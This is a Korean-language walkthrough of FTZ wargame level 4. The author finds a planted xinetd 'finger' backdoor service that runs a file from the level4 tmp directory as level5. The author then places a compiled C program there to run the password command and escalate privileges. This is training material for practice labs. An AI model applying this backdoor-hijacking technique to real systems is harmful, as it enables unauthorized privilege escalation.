[F.T.Z] level4

[level4@ftz level4]$ ls

hint  public_html  tmp

[level4@ftz level4]$ cat hint

누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!

/etc/xinetd.d로 이동을 하겠슴돠

[level4@ftz xinetd.d]$ ls -l

합계 84

-rw-r-----    1 root     level4        171 12월  8  2003 backdoor

-rw-r--r--    1 root     root          563  2월 25  2003 chargen

-rw-r--r--    1 root     root          580  2월 25  2003 chargen-udp

-rwxr-xr-x    1 root     root          239  2월 13  2003 cups-lpd

-rw-r--r--    1 root     root          453 12월 19  2008 daytime

(생략)...

[level4@ftz xinetd.d]$ cat backdoor

service finger

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = level5

        server          = /home/level4/tmp/backdoor

        log_on_failure  += USERID

}

finger명령어를 입력하면 level5의 권한으로 /home/level4/tmp/backdoor을 실행시키는 겁니다.

$vi backdoor.c

#include<stdio.h>

main()

{

        system("my-pass");

}

위의 코드를 작석하셔서 backdoor로 컴파일 시켜줍니다.

 빠밤!!! get Password :)

=================

알게된 것

 #backdoor :: 시스템침투에 성공한 크래커가 쉽게 침투하기 위해 만든 뒷문

 #/etc/xinetd.d ::슈퍼데몬(자세한 사항 : http://light99.egloos.com/5142379)